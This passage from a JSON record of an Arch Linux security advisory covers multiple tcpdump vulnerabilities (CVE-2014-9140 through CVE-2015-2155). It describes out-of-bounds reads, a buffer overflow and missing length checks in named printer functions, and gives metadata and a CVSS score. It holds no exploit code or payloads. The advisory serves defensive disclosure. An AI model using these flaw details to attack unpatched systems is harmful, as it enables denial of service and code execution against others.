(out-of-bounds memory read)\n\nMight allow remote attackers to obtain sensitive information from memory\nor cause a denial of service (packet loss or segmentation fault) via a\ncrafted Ad hoc On-Demand Distance Vector (AODV) packet, which triggers\nan out-of-bounds memory access.\n\n- CVE-2014-9140 (denial of service)\n\nBuffer overflow in the ppp_hdlc function in print-ppp.c allows remote\nattackers to cause a denial of service (crash) cia a crafted PPP packet\nor possibly execute arbitrary code.\n\n- CVE-2015-0261 (out-of-bounds memory read)\n\nIPv6 mobility printer mobility_opt_print() typecastimg/signedness error\nwould handle "len" as "int" (=positive and negative numbers), instead of\n"unsigned int" (=only positive numbers). When calling\nmobility_opt_print() with a negative "len", the "i < len" check would\nnot be satisfied and it would not enter the loop and try to read from bp[i].\n\n- CVE-2015-2153 (arbitrary code execution)\n\nTCP printer problem with missing length check in the\nrpki_rtr_pdu_print() function in print-rpki-rtr.c when processing\nRPKI-RTR PDUs (Protocol Data Units) with an incorrect header length.\nWithout this check, the function will try to operate on invalid data\nwhen processing certain packets, leading to all kinds of unwanted side\neffects, including crashes due to invalid reads, writes and general\nmemory corruption. Due to the memory corruption aspect it may lead to\ncode execution.\n\n- CVE-2015-2154 (out-of-bounds memory read)\n\nEthernet printer osi_print_cksum() missing sanity checks in\nprint-isoclns.c. The function may call the create_osi_cksum() function\nin checksum.c with invalid data leading to out-of-bounds memory read.\n\n- CVE-2015-2155 (arbitrary code execution)\n\nA flaw was found in tcpdump's force printer. A remote attacker could use\nthis flaw to cause tcpdump to crash, resulting in a denial of service,\nor possibly execute arbitrary code.", "modified": "2015-03-20T00:00:00", "published": "2015-03-20T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-March/000261.html", "id": "ASA-201503-20", "title": "tcpdump: multiple issues", "type": "archlinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}